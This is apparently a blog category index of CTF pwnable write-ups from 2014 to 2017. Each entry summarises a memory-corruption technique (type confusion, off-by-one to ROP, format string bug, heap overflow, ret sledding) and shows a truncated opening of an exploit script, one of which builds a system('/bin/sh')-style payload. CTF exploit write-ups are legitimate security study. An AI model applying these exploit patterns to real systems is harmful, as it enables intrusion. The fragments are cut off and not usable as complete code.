CTF

· CTF/2017
Category : Pwnables Summary : C++, missed value assignment Exploit #!/usr/bin/python from pwn import *from struct import pack, unpack def c_set(s, name, sound, feed):s.sendline('4')# set # overflow for leak s.recvuntil('select for set:')s.sendline('1') # animal1 s.recvuntil('name:')s.sendline(name) s.recvuntil('sound:')s.sendline(sound) s.recvuntil('feed:')s.sendline(feed) def c_setname(s, person): s.s..
· CTF/2017
Category : Pwnables Summary : type confusion, c++, free heap Exploit#!/usr/bin/python from pwn import *from struct import pack, unpackp = lambda x : pack("
· CTF/2016
Category : Pwnables Summary : off-by-one to ROP, setjmp Exploit #!/usr/bin/python from socket import * from struct import pack, unpack import time def rc(s, ch): res = '' while ch not in res: res += s.recv(1) return res #def ror64(value, count): def ROR(data, shift, size=64): shift %= size body = data >> shift remains = (data
· CTF/2016
Category : Pwnables Summary : memory leak with SSP protection Exploit #!/usr/bin/python from socket import * from struct import pack, unpack import time def rc(s, ch): res = '' while ch not in res: res += s.recv(1) return res p = lambda x : pack("
· CTF/2014
Category : Pwnables Summary : make chdir() fail, get admin password, 13-byte format string bug (FSB) Exploit #!/usr/bin/pythonfrom socket import *from struct import pack,unpack p = lambda x:pack("value")num = ((stack&0x0000ffff) - 4)-926payload = ""payload += p(system_addr)payload += "aaaa"payload += p(system_arg) s.send("4\n")s.recv(1024) s.send("1\n")s.recv(1024)s.send("admin\x00"+payload+"\x00\x00\x00\x00/bin/s..
· CTF/2014
Category : Pwnables Summary : overwrite a function pointer in the heap via heap overflow or use-after-free, lift esp + ret sledding loader.c #include #define RET "\x37\x93\x04\x08"#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET#define EXECL "\x40\x2e\x0f\x40"//#define EXECL "\x50\x24\x0f\x40"#define BINARY "\x74\x81\x04..
· CTF/2014
Category : Pwnables Summary : clear the game, overwrite any 4 bytes of memory except 0x0804XXXX, _exit calls %gs + 0x14, lift esp + ret sledding loader.c #include #define RET "\x20\x99\x04\x08" // 0x08049920 retn#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET #define JMPESP "\x7d\x2a\x08\x40" // 0x40082a7d: jmp *%esp#defi..
pwn3r_45
'CTF' 카테고리의 글 목록 (6 Page)